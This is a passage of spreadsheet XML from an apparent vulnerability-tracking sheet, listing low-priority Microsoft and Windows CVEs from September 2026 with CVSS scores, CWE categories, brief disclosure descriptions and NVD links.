      <c r="F4628" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4628" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4628" s="5" t="inlineStr"/>
      <c r="I4628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4628" s="5" t="inlineStr"/>
      <c r="K4628" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-908</t>
        </is>
      </c>
      <c r="L4628" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t>
        </is>
      </c>
    </row>
    <row r="4629">
      <c r="A4629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68873</t>
        </is>
      </c>
      <c r="C4629" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4629" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4629" s="5" t="inlineStr"/>
      <c r="F4629" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4629" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4629" s="5" t="inlineStr"/>
      <c r="I4629" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4629" s="5" t="inlineStr"/>
      <c r="K4629" s="5" t="inlineStr">
        <is>
          <t>CWE-532, CWE-908</t>
        </is>
      </c>
      <c r="L4629" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t>
        </is>
      </c>
    </row>
    <row r="4630">
      <c r="A4630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68881</t>
        </is>
      </c>
      <c r="C4630" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4630" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4630" s="5" t="inlineStr"/>
      <c r="F4630" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4630" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4630" s="5" t="inlineStr"/>
      <c r="I4630" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4630" s="5" t="inlineStr"/>
      <c r="K4630" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4630" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t>
        </is>
      </c>
    </row>
    <row r="4631">
      <c r="A4631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68886</t>
        </is>
      </c>
      <c r="C4631" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4631" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4631" s="5" t="inlineStr"/>
      <c r="F4631" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4631" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4631" s="5" t="inlineStr"/>
      <c r="I4631" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4631" s="5" t="inlineStr"/>
      <c r="K4631" s="5" t="inlineStr">
        <is>
          <t>CWE-209, CWE-416</t>
        </is>
      </c>
      <c r="L4631" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t>
        </is>
      </c>
    </row>
    <row r="4632">
      <c r="A4632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68895</t>
        </is>
      </c>
      <c r="C4632" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4632" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4632" s="5" t="inlineStr"/>
      <c r="F4632" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4632" s="5" t="inlineStr"/>
      <c r="H4632" s="5" t="inlineStr"/>
      <c r="I4632" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4632" s="5" t="inlineStr"/>
      <c r="K4632" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="L4632" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Internet Storage Name Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68895</t>
        </is>
      </c>
    </row>
    <row r="4633">
      <c r="A4633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="C4633" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4633" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4633" s="5" t="inlineStr"/>
      <c r="F4633" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4633" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4633" s="5" t="inlineStr"/>
      <c r="I4633" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4633" s="5" t="inlineStr"/>
      <c r="K4633" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L4633" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="4634">
      <c r="A4634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69288</t>
        </is>
      </c>
      <c r="C4634" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4634" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4634" s="5" t="inlineStr"/>
      <c r="F4634" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4634" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4634" s="5" t="inlineStr"/>
      <c r="I4634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4634" s="5" t="inlineStr"/>
      <c r="K4634" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4634" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t>
        </is>
      </c>
    </row>
    <row r="4635">
      <c r="A4635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69294</t>
        </is>
      </c>
      <c r="C4635" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4635" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4635" s="5" t="inlineStr"/>
      <c r="F4635" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4635" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4635" s="5" t="inlineStr"/>
      <c r="I4635" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4635" s="5" t="inlineStr"/>
      <c r="K4635" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L4635" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t>
        </is>
      </c>
    </row>
    <row r="4636">
      <c r="A4636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69303</t>
        </is>
      </c>
      <c r="C4636" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4636" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4636" s="5" t="inlineStr"/>
      <c r="F4636" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4636" s="5" t="inlineStr"/>
      <c r="H4636" s="5" t="inlineStr"/>
      <c r="I4636" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4636" s="5" t="inlineStr"/>
      <c r="K4636" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="L4636" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69303</t>
        </is>
      </c>
    </row>
    <row r="4637">
      <c r="A4637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69308</t>
        </is>
      </c>
      <c r="C4637" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4637" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4637" s="5" t="inlineStr"/>
      <c r="F4637" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4637" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4637" s="5" t="inlineStr"/>
      <c r="I4637" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4637" s="5" t="inlineStr"/>
      <c r="K4637" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L4637" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t>
        </is>
      </c>
    </row>
    <row r="4638">
      <c r="A4638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69315</t>
        </is>
      </c>
      <c r="C4638" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4638" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4638" s="5" t="inlineStr"/>
      <c r="F4638" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4638" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4638" s="5" t="inlineStr"/>
      <c r="I4638" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4638" s="5" t="inlineStr"/>
      <c r="K4638" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4638" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t>
        </is>
      </c>
    </row>
    <row r="4639">
      <c r="A4639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69318</t>
        </is>
      </c>
      <c r="C4639" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4639" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4639" s="5" t="inlineStr"/>
      <c r="F4639" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4639" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4639" s="5" t="inlineStr"/>
      <c r="I4639" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4639" s="5" t="inlineStr"/>
      <c r="K4639" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4639" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t>
        </is>
      </c>
    </row>
    <row r="4640">
      <c r="A4640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69321</t>
        </is>
      </c>
      <c r="C4640" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4640" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4640" s="5" t="inlineStr"/>
      <c r="F4640" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4640" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4640" s="5" t="inlineStr"/>
      <c r="I4640" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4640" s="5" t="inlineStr"/>
      <c r="K4640" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4640" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t>
        </is>
      </c>
    </row>
    <row r="4641">
      <c r="A4641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69339</t>
        </is>
      </c>
      <c r="C4641" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4641" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4641" s="5" t="inlineStr"/>
      <c r="F4641" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4641" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4641" s="5" t="inlineStr"/>
      <c r="I4641" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4641" s="5" t="inlineStr"/>
      <c r="K4641" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4641" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t>
        </is>
      </c>
    </row>
    <row r="4642">
      <c r="A4642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="C4642" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4642" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4642" s="5" t="inlineStr"/>
      <c r="F4642" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4642" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4642" s="5" t="inlineStr"/>
      <c r="I4642" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4642" s="5" t="inlineStr"/>
      <c r="K4642" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4642" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="4643">
      <c r="A4643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69344</t>
        </is>
      </c>
      <c r="C4643" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4643" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4643" s="5" t="inlineStr"/>
      <c r="F4643" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4643" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4643" s="5" t="inlineStr"/>
      <c r="I4643" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4643" s="5" t="inlineStr"/>
      <c r="K4643" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4643" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t>
        </is>
      </c>
    </row>
    <row r="4644">
      <c r="A4644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69345</t>
        </is>
      </c>
      <c r="C4644" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4644" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4644" s="5" t="inlineStr"/>
      <c r="F4644" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4644" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4644" s="5" t="inlineStr"/>
      <c r="I4644" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4644" s="5" t="inlineStr"/>
      <c r="K4644" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4644" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t>
        </is>
      </c>
    </row>
    <row r="4645">
      <c r="A4645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69351</t>
        </is>
      </c>
      <c r="C4645" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4645" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4645" s="5" t="inlineStr"/>
      <c r="F4645" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4645" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4645" s="5" t="inlineStr"/>
      <c r="I4645" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4645" s="5" t="inlineStr"/>
      <c r="K4645" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="L4645" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t>
        </is>
      </c>
    </row>
    <row r="4646">
      <c r="A4646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69353</t>
        </is>
      </c>
      <c r="C4646" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4646" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4646" s="5" t="inlineStr"/>
      <c r="F4646" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4646" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4646" s="5" t="inlineStr"/>
      <c r="I4646" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4646" s="5" t="inlineStr"/>
      <c r="K4646" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4646" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t>
        </is>
      </c>
    </row>
    <row r="4647">
      <c r="A4647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69367</t>
        </is>
      </c>
      <c r="C4647" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4647" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4647" s="5" t="inlineStr"/>
      <c r="F4647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4647" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4647" s="5" t="inlineStr"/>
      <c r="I4647" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4647" s="5" t="inlineStr"/>
      <c r="K4647" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4647" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t>
        </is>
      </c>
    </row>
    <row r="4648">
      <c r="A4648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69369</t>
        </is>
      </c>
      <c r="C4648" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4648" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4648" s="5" t="inlineStr"/>
      <c r="F4648" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4648" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4648" s="5" t="inlineStr"/>
      <c r="I4648" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4648" s="5" t="inlineStr"/>
      <c r="K4648" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4648" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t>
        </is>
      </c>
    </row>
    <row r="4649">
      <c r="A4649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69376</t>
        </is>
      </c>
      <c r="C4649" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4649" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4649" s="5" t="inlineStr"/>
      <c r="F4649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4649" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4649" s="5" t="inlineStr"/>
      <c r="I4649" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4649" s="5" t="inlineStr"/>
      <c r="K4649" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4649" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t>
        </is>
      </c>
    </row>
    <row r="4650">
      <c r="A4650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69390</t>
        </is>
      </c>
      <c r="C4650" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4650" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4650" s="5" t="inlineStr"/>
      <c r="F4650" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4650" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4650" s="5" t="inlineStr"/>
      <c r="I4650" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4650" s="5" t="inlineStr"/>
      <c r="K4650" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4650" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t>
        </is>
      </c>
    </row>
    <row r="4651">
      <c r="A4651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69403</t>
        </is>
      </c>
      <c r="C4651" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4651" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4651" s="5" t="inlineStr"/>
      <c r="F4651" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4651" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4651" s="5" t="inlineStr"/>
      <c r="I4651" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4651" s="5" t="inlineStr"/>
      <c r="K4651" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4651" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t>
        </is>
      </c>
    </row>
    <row r="4652">
      <c r="A4652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69406</t>
        </is>
      </c>
      <c r="C4652" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4652" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4652" s="5" t="inlineStr"/>
      <c r="F4652" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4652" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
